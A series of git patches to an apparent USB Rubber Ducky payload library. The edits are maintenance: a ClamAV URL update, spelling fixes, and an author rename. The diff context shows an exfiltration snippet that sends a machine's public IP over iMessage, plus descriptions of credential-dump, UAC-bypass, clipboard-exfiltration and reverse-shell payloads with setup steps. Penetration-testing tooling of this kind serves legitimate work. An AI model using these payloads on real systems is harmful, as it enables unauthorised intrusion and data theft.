From b3c95f7b7dde81f7dad5384f016c43c959b02151 Mon Sep 17 00:00:00 2001
From: jbjb6000 <114012750+jbjb6000@users.noreply.github.com>
Date: Thu, 8 Feb 2024 18:01:26 -0500
Subject: [PATCH 1/4] Update payload.txt
Updated the zip file to point to the new version path.
---
payloads/library/incident_response/GoodUSB/payload.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/library/incident_response/GoodUSB/payload.txt b/payloads/library/incident_response/GoodUSB/payload.txt
index 2347b64..c8d02c9 100644
--- a/payloads/library/incident_response/GoodUSB/payload.txt
+++ b/payloads/library/incident_response/GoodUSB/payload.txt
@@ -51,5 +51,5 @@ DELAY 4000
LEFT
ENTER
DELAY 4000
-STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-0.105.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam
+STRING mkdir $env:USERPROFILE\AppData\Local\Temp ; cd $env:USERPROFILE\AppData\Local\Temp ; Invoke-WebRequest -Uri https://www.clamav.net/downloads/production/clamav-1.3.0.win.x64.zip -OutFile clam.zip ; Expand-Archive -Force clam.zip ; del clam.zip ; cd clam\* ; mv .\conf_examples\freshclam.conf.sample freshclam.conf ; mv .\conf_examples\clamd.conf.sample clamd.conf ; Set-Content -Path "freshclam.conf" -Value (get-content -Path "freshclam.conf" | Select-String -Pattern 'Example' -NotMatch) ; Set-Content -Path "clamd.conf" -Value (get-content -Path "clamd.conf" | Select-String -Pattern 'Example' -NotMatch) ; Start-Process -Wait .\freshclam.exe ; Start-Process -NoNewWindow -Wait .\clamscan.exe "--memory --kill" ; cd $env:USERPROFILE\AppData\Local\Temp ; rmdir -R clam
ENTER
From 8bc5dd096c416ae0f481f02b05962254919ec3e4 Mon Sep 17 00:00:00 2001
From: Matthew Kayne <45180131+matthewkayne@users.noreply.github.com>
Date: Wed, 6 Mar 2024 20:34:11 +0000
Subject: [PATCH 2/4] Update payload.txt
Fixed spelling and grammar errors in the comments
---
.../library/exfiltration/iMessage-Data-Grabber/payload.txt | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt b/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt
index 4a9c00c..20ee796 100644
--- a/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt
+++ b/payloads/library/exfiltration/iMessage-Data-Grabber/payload.txt
@@ -13,12 +13,12 @@ STRING Terminal
DELAY 200
ENTER
DELAY 200
-REM Change this command inside the brackets too any command that outputs text to the terminal
+REM Change this command inside the brackets to any command that outputs text to the terminal
STRING x=$(curl ifconfig.me)
DELAY 200
ENTER
DELAY 200
-REM Replace PHONE_NUMBER with you iMessage supported number (leave the @'s, they are required to run)
+REM Replace PHONE_NUMBER with your iMessage supported number (leave the @'s, they are required to run)
STRING osascript -e 'tell application @Messages@ to send @'$x'@ to buddy @PHONE_NUMBER@'
DELAY 100
ENTER
From e606d300116e48272ebe4dbcc50fbab4475ccb1c Mon Sep 17 00:00:00 2001
From: Superuser2047 <160431987+Superuser2047@users.noreply.github.com>
Date: Sat, 11 May 2024 16:31:53 -0600
Subject: [PATCH 3/4] Update README.md
Fixed typo
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 7e689d0..d2471bd 100644
--- a/README.md
+++ b/README.md
@@ -116,7 +116,7 @@ Core to its success is its simple language, DuckyScript™. Originally just thre
## DuckyScript 3.0
DuckyScript 3.0 is a feature rich, structured programming language. It includes all of the previously available commands and features of the original DuckyScript.
-(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 paylaods are valid DuckyScript 3.0)
+(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 payloads are valid DuckyScript 3.0)
Additionally, DuckyScript 3.0 introduces [control flow constructs](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements "View Documentation"), [loops](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops "View Documentation"), [functions](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions "View Documentation"), [extensions](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions "View Documentation").
Plus, DuckyScript 3.0 includes many features specific to [keystroke injection](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection "View Documentation") attack/automation, such as [HID & Storage attack modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes "View Documentation"), OS Detection, [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#the-keystroke-reflection-attack "View Documentation") ([Video + Whitepaper](https://shop.hak5.org/pages/keystroke-reflection "Keystroke Reflection Video + Whitepaper")), [jitter](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter "View Documentation") and [randomization](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization "View Documentation") to name a few.
From 40f7f072ea9fc428a9ef991b13c8e3e0838c99ed Mon Sep 17 00:00:00 2001
From: 0i41E <79219148+0i41E@users.noreply.github.com>
Date: Tue, 28 May 2024 19:25:26 +0200
Subject: [PATCH 4/4] Changed Username
---
payloads/extensions/community/DETECT_FINISHED | 2 +-
.../extensions/community/POWERSHELL_DOWNLOAD | 2 +-
.../community/ROLLING_POWERSHELL_EXECUTION | 2 +-
.../community/WINDOWS11_CONSOLE_DOWNGRADE | 2 +-
.../community/WINDOWS_ELEVATED_EXECUTION | 2 +-
.../community/WINDOWS_FILELESS_HID_EXFIL | 2 +-
.../credentials/BitLockerKeyDump/payload.txt | 10 +++++-----
.../credentials/BitLockerKeyDump/readme.md | 2 +-
.../library/credentials/SamDumpDucky/README.md | 4 ++--
.../library/credentials/SamDumpDucky/payload.txt | 10 +++++-----
.../WindowsLicenseKeyExfiltration.txt | 10 +++++-----
.../WindowsLicenseKeyExfiltration/readme.md | 2 +-
.../execution/DuckyHelper/DuckyHelper.txt | 2 +-
.../exfiltration/ClipBoard-Creep/README.md | 6 +++---
.../exfiltration/ClipBoard-Creep/payload.txt | 8 ++++----
.../library/exfiltration/HashDumpDucky/README.md | 4 ++--
.../exfiltration/HashDumpDucky/payload.txt | 2 +-
.../library/general/EngagementDucky/readme.md | 6 +++---
payloads/library/general/duckin8or/payload.txt | 2 +-
payloads/library/prank/-RD-AcidBurn/README.md | 2 +-
payloads/library/prank/-RD-JumpScare/README.md | 2 +-
payloads/library/prank/EternalLock/payload.txt | 2 +-
payloads/library/prank/SoundChangeDuck/README.md | 2 +-
.../library/prank/SoundChangeDuck/payload.txt | 2 +-
.../PingZhellDucky/PingZhellDucky.pl | 2 +-
.../remote_access/PingZhellDucky/README.md | 16 ++++++++--------
.../remote_access/PingZhellDucky/payload.txt | 4 ++--
.../remote_access/ReverseDucky/ReverseDucky.txt | 2 +-
.../ReverseDuckyII/ReverseDuckyII.txt | 2 +-
.../remote_access/ReverseDuckyIII/payload.txt | 2 +-
.../ReverseDuckyPolymorph/README.md | 6 +++---
.../ReverseDuckyPolymorph/payload.txt | 2 +-
.../remote_access/ReverseDuckyUltimate/README.md | 16 ++++++++--------
.../ReverseDuckyUltimate/payload.txt | 12 ++++++------
34 files changed, 77 insertions(+), 77 deletions(-)
diff --git a/payloads/extensions/community/DETECT_FINISHED b/payloads/extensions/community/DETECT_FINISHED
index 3af4600..75fc23c 100644
--- a/payloads/extensions/community/DETECT_FINISHED
+++ b/payloads/extensions/community/DETECT_FINISHED
@@ -1,6 +1,6 @@
EXTENSION DETECT_FINISHED
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
diff --git a/payloads/extensions/community/POWERSHELL_DOWNLOAD b/payloads/extensions/community/POWERSHELL_DOWNLOAD
index 9e67d3b..3b50b52 100644
--- a/payloads/extensions/community/POWERSHELL_DOWNLOAD
+++ b/payloads/extensions/community/POWERSHELL_DOWNLOAD
@@ -1,6 +1,6 @@
EXTENSION POWERSHELL_DOWNLOAD
REM VERSION 1.0
- REM Author: 0iphor13
+ REM Author: 0i41E
REM Downloads the desired file via powershell
REM Use the method you want to use, via the specific function, define the URL and the output.
diff --git a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION
index 2738fa7..e64dae1 100644
--- a/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION
+++ b/payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION
@@ -1,6 +1,6 @@
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
- REM Author: 0iphor13
+ REM Author: 0i41E
REM OS: Windows
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
diff --git a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE
index 41df572..230b58d 100644
--- a/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE
+++ b/payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE
@@ -1,7 +1,7 @@
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
- Author: 0iphor13
+ Author: 0i41E
Description: Downgrade the default command prompt of Windows 11 to use Conhost again.
Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
END_REM
diff --git a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION
index 9e817e0..419b6e7 100644
--- a/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION
+++ b/payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION
@@ -1,6 +1,6 @@
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
- REM Author: 0iphor13
+ REM Author: 0i41E
REM Executes the desired program with elevated privileges
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
REM additional extensions
diff --git a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL
index 597325b..a0cada8 100644
--- a/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL
+++ b/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL
@@ -1,6 +1,6 @@
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
diff --git a/payloads/library/credentials/BitLockerKeyDump/payload.txt b/payloads/library/credentials/BitLockerKeyDump/payload.txt
index cee6125..aedd6b4 100644
--- a/payloads/library/credentials/BitLockerKeyDump/payload.txt
+++ b/payloads/library/credentials/BitLockerKeyDump/payload.txt
@@ -1,7 +1,7 @@
REM BitLockerKeyDump
REM Version 1.0
REM OS: Windows
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection
@@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
-REM Extension made by 0iphor13 to signalize the payloads end
+REM Extension made by 0i41E to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
@@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
END_FUNCTION
END_EXTENSION
-REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
+REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
diff --git a/payloads/library/credentials/BitLockerKeyDump/readme.md b/payloads/library/credentials/BitLockerKeyDump/readme.md
index 7fd6559..5a7bc76 100644
--- a/payloads/library/credentials/BitLockerKeyDump/readme.md
+++ b/payloads/library/credentials/BitLockerKeyDump/readme.md
@@ -1,6 +1,6 @@
**Title: BitLockerKeyDump**
-Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/credentials/SamDumpDucky/README.md b/payloads/library/credentials/SamDumpDucky/README.md
index 384a32e..e1e8ef2 100644
--- a/payloads/library/credentials/SamDumpDucky/README.md
+++ b/payloads/library/credentials/SamDumpDucky/README.md
@@ -1,6 +1,6 @@
**Title: SamDumpDucky**
-
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 2.0
@@ -23,4 +23,4 @@ Afterwards you can use a tool like pypykatz to extract the users hashes.
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
-
+
diff --git a/payloads/library/credentials/SamDumpDucky/payload.txt b/payloads/library/credentials/SamDumpDucky/payload.txt
index 2c501e0..cb74144 100644
--- a/payloads/library/credentials/SamDumpDucky/payload.txt
+++ b/payloads/library/credentials/SamDumpDucky/payload.txt
@@ -1,6 +1,6 @@
REM Title: SamDumpDucky
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.
-REM Author: 0iphor13
+REM Author: 0i41E
REM Version: 2.0
REM Category: Credentials
REM Attackmodes: HID, Storage
@@ -36,10 +36,10 @@ EXTENSION DETECT_READY
CAPSLOCK
END_EXTENSION
-REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here
+REM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
- REM Author: 0iphor13
+ REM Author: 0i41E
REM Executes the desired program with elevated privileges
REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts
REM additional extensions
@@ -71,10 +71,10 @@ EXTENSION WINDOWS_ELEVATED_EXECUTION
END_EXTENSION
-REM Extension by 0iphor13, to signalize the successful execution of the payload
+REM Extension by 0i41E, to signalize the successful execution of the payload
EXTENSION DETECT_FINISHED
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
diff --git a/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt b/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt
index 6447a73..1837442 100644
--- a/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt
+++ b/payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt
@@ -1,7 +1,7 @@
REM WindowsLicenseKeyExfiltration
REM Version 1.0
REM OS: Windows
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.
@@ -49,10 +49,10 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
-REM Extension made by 0iphor13 to signalize the payloads end
+REM Extension made by 0i41E to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
@@ -82,10 +82,10 @@ EXTENSION DETECT_FINISHED
END_FUNCTION
END_EXTENSION
-REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
+REM Extension made by 0i41E for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
diff --git a/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md b/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md
index 794ae2d..fda20ba 100644
--- a/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md
+++ b/payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md
@@ -1,6 +1,6 @@
**Title: WindowsLicenseKeyExfiltration**
-Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/execution/DuckyHelper/DuckyHelper.txt b/payloads/library/execution/DuckyHelper/DuckyHelper.txt
index 6fc6557..26d3023 100644
--- a/payloads/library/execution/DuckyHelper/DuckyHelper.txt
+++ b/payloads/library/execution/DuckyHelper/DuckyHelper.txt
@@ -1,7 +1,7 @@
REM DuckyHelper
REM Version 1.0
REM OS: Windows 10
-REM Author: 0iphor13
+REM Author: 0i41E
REM UAC bypass for privilege escalation (Method FodHelper)
REM AV will notify, but payload will still be executed
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/README.md b/payloads/library/exfiltration/ClipBoard-Creep/README.md
index 67cc32b..58ecdef 100644
--- a/payloads/library/exfiltration/ClipBoard-Creep/README.md
+++ b/payloads/library/exfiltration/ClipBoard-Creep/README.md
@@ -6,12 +6,12 @@ Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrat
### #HOOK ###
Define your webhook under #HOOK
-
+
### #CALLBACK_DELAY ###
Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
-
+
After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook.
-
+
diff --git a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
index a9a01dc..7851df7 100644
--- a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
+++ b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
@@ -1,10 +1,10 @@
REM Clipboard-Creep
REM Version 1.0
REM OS: Windows
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
-REM Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep
+REM Based on Clipboard-Creep.ps1 - https://github.com/0i41E/ClipBoard-Creep
EXTENSION PASSIVE_WINDOWS_DETECT
@@ -52,7 +52,7 @@ END_EXTENSION
EXTENSION EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
- REM Author: 0iphor13
+ REM Author: 0i41E
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
@@ -132,7 +132,7 @@ END_EXTENSION
EXTENSION Detect_Finished
REM VERSION 1.0
- REM AUTHOR: 0iphor13
+ REM AUTHOR: 0i41E
REM_BLOCK DOCUMENTATION
USAGE:
diff --git a/payloads/library/exfiltration/HashDumpDucky/README.md b/payloads/library/exfiltration/HashDumpDucky/README.md
index 9e7171c..9c97e74 100644
--- a/payloads/library/exfiltration/HashDumpDucky/README.md
+++ b/payloads/library/exfiltration/HashDumpDucky/README.md
@@ -1,6 +1,6 @@
**Title: HashDumpDucky**
-
Author: 0iphor13
+
Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0
@@ -17,6 +17,6 @@ Bring some time... This payload will run an obfuscated script to dump user hashe
Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go
#
Exfiltrate the out.txt file and try to crack the hashes.
-
+
*props to Nikhil Mittal*
diff --git a/payloads/library/exfiltration/HashDumpDucky/payload.txt b/payloads/library/exfiltration/HashDumpDucky/payload.txt
index f6e8156..56361c9 100644
--- a/payloads/library/exfiltration/HashDumpDucky/payload.txt
+++ b/payloads/library/exfiltration/HashDumpDucky/payload.txt
@@ -1,7 +1,7 @@
REM HashDumpDucky
REM Version 1.0
REM OS: Windows
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirements: RubberDucky mk2/DuckyScript 3.0
REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection.
diff --git a/payloads/library/general/EngagementDucky/readme.md b/payloads/library/general/EngagementDucky/readme.md
index 18fbf67..f373412 100644
--- a/payloads/library/general/EngagementDucky/readme.md
+++ b/payloads/library/general/EngagementDucky/readme.md
@@ -1,6 +1,6 @@
**Title: EngagementDucky**
-Author: 0iphor13
+
Author: 0i41E
OS: Windows
Requirements: DuckyScript 3.0
Version: 1.0
@@ -10,7 +10,7 @@ Version: 1.0
EngagementDucky will help you generating your evidence. Typical proof of compromise is normally something harmless like a message in notepad on your targets machine. This payload will pop a message box, containing Username, Hostname, Time and Date. Afterwards Ducky will generate a screenshot of this message box and will save it. Afterwards you can walk away. Combine this with specific USB identifiers to help identifying you.
Step up your game and demonstrate impact in a few seconds without leaving your scope.
-
+
**Instruction:**
1. Configure USB identifiers
@@ -18,4 +18,4 @@ Step up your game and demonstrate impact in a few seconds without leaving your s
2. Place inject.bin onto your Ducky
3. Plug in your Ducky and wait until finish... walk away
-
+
diff --git a/payloads/library/general/duckin8or/payload.txt b/payloads/library/general/duckin8or/payload.txt
index 938b518..ae6eb79 100644
--- a/payloads/library/general/duckin8or/payload.txt
+++ b/payloads/library/general/duckin8or/payload.txt
@@ -54,7 +54,7 @@ REM # * Be responsible.
REM # #
REM # Kudos: #
REM # * RootJunky - "Three Payloads from LOCK Key Double Press" #
-REM # * 0iphor13 - "EngagementDucky", "ReverseDuckyII" #
+REM # * 0i41E - "EngagementDucky", "ReverseDuckyII" #
REM # * the-jcksn - "ducky_crab" #
REM # * I am Jakoby - "-RD-PineApple" #
REM # * Hak5 Team #
diff --git a/payloads/library/prank/-RD-AcidBurn/README.md b/payloads/library/prank/-RD-AcidBurn/README.md
index 8414320..77808ba 100644
--- a/payloads/library/prank/-RD-AcidBurn/README.md
+++ b/payloads/library/prank/-RD-AcidBurn/README.md
@@ -105,7 +105,7 @@ Arf
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
-* [0iphor13](https://github.com/0iphor13)
+* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)
diff --git a/payloads/library/prank/-RD-JumpScare/README.md b/payloads/library/prank/-RD-JumpScare/README.md
index 3781747..53ef0dc 100644
--- a/payloads/library/prank/-RD-JumpScare/README.md
+++ b/payloads/library/prank/-RD-JumpScare/README.md
@@ -95,7 +95,7 @@ Arf
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
-* [0iphor13](https://github.com/0iphor13)
+* [0i41E](https://github.com/0i41E)
* [PhilSutter](https://github.com/PhilSutter)
diff --git a/payloads/library/prank/EternalLock/payload.txt b/payloads/library/prank/EternalLock/payload.txt
index 2aaee31..bf5eeef 100644
--- a/payloads/library/prank/EternalLock/payload.txt
+++ b/payloads/library/prank/EternalLock/payload.txt
@@ -1,7 +1,7 @@
REM EternalLock
REM Version 1.0
REM OS: Windows / Unix
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)
diff --git a/payloads/library/prank/SoundChangeDuck/README.md b/payloads/library/prank/SoundChangeDuck/README.md
index 40617b8..3b6450c 100644
--- a/payloads/library/prank/SoundChangeDuck/README.md
+++ b/payloads/library/prank/SoundChangeDuck/README.md
@@ -1,6 +1,6 @@
**Title: SoundChangeDuck**
-Author: 0iphor13
+
Author: 0i41E
OS: Windows
Version: 1.0
diff --git a/payloads/library/prank/SoundChangeDuck/payload.txt b/payloads/library/prank/SoundChangeDuck/payload.txt
index 5ad9118..215d76f 100644
--- a/payloads/library/prank/SoundChangeDuck/payload.txt
+++ b/payloads/library/prank/SoundChangeDuck/payload.txt
@@ -1,7 +1,7 @@
REM SoundChangeDuck
REM Version 1.0
REM OS: Windows
-REM Author: 0iphor13
+REM Author: 0i41E
REM Nothing special, something cheap. Changes the sound of device connection from Hardware Insert to Hardware fail.
REM You can of course decide which system sounds you want to change.
diff --git a/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl b/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
index d4a64c3..5ee0755 100644
--- a/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
+++ b/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
@@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
-# Modified by 0iphor13 for PingZhellDucky
+# Modified by 0i41E for PingZhellDucky
#
#
#
diff --git a/payloads/library/remote_access/PingZhellDucky/README.md b/payloads/library/remote_access/PingZhellDucky/README.md
index 51cfea5..305749b 100644
--- a/payloads/library/remote_access/PingZhellDucky/README.md
+++ b/payloads/library/remote_access/PingZhellDucky/README.md
@@ -1,6 +1,6 @@
**Title: PingZhellDucky**
-Author: 0iphor13
+
Author: 0i41E
OS: Windows & Unix
Version: 1.2
Requirements: DuckyScript 3.0, perl
@@ -20,16 +20,16 @@ After PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is di
With automatic setup:
Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own
-
+
Define the IP of your attacking machine between the quotes at the ATTACKER section
-
+
Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!)
-
+
Start the client -> `perl PingZhellDucky.pl`
-
+
Plug your Ducky into a Windows target.
Achieve reverse shell.
@@ -38,7 +38,7 @@ Achieve reverse shell.
**Instruction Version 2:**
Without automatic setup:
Define INSTALL and set it to FALSE
-
+
Upload PingZhellDucky.pl onto your attacking machine.
Install dependencies, if needed:
@@ -50,10 +50,10 @@ Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start the client -> `perl PingZhellDucky.pl`
-
+
Define the IP of your attacking machine between the quotes at the ATTACKER section
-
+
Plug your Ducky into a Windows target.
Achieve reverse shell.
diff --git a/payloads/library/remote_access/PingZhellDucky/payload.txt b/payloads/library/remote_access/PingZhellDucky/payload.txt
index 4e8d257..8b6ab86 100644
--- a/payloads/library/remote_access/PingZhellDucky/payload.txt
+++ b/payloads/library/remote_access/PingZhellDucky/payload.txt
@@ -1,7 +1,7 @@
REM PingZhellDucky
REM Version 1.2
REM OS: Windows & Unix
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirements: DuckScript 3.0, Perl
REM Getting remote access via ICMP or perform the required setup
@@ -54,7 +54,7 @@ REM Do you want to install the dependencies and set up the infratructre?
REM Will trigger when not using Windows - Best use with Linux
DEFINE INSTALL TRUE
REM Link to the PingZhellDucky.pl client - Required for installation
-DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
+DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
IF ($_OS == WINDOWS) THEN
diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
index 2f425ec..4a3adee 100644
--- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
+++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
@@ -1,7 +1,7 @@
REM ReverseDucky
REM Version 2.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
index d71b496..4cb1e4c 100644
--- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
+++ b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
@@ -1,7 +1,7 @@
REM ReverseDuckyII
REM Version 2.0
REM OS: Windows / Multi
-REM Author: 0iphor13
+REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
diff --git a/payloads/library/remote_access/ReverseDuckyIII/payload.txt b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
index 8039dd8..12fb17e 100644
--- a/payloads/library/remote_access/ReverseDuckyIII/payload.txt
+++ b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
@@ -1,7 +1,7 @@
REM ReverseDucky3
REM Version 1.2 (End of Life - This payload won't be updated anymore)
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
-REM Author: 0iphor13
+REM Author: 0i41E
REM UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
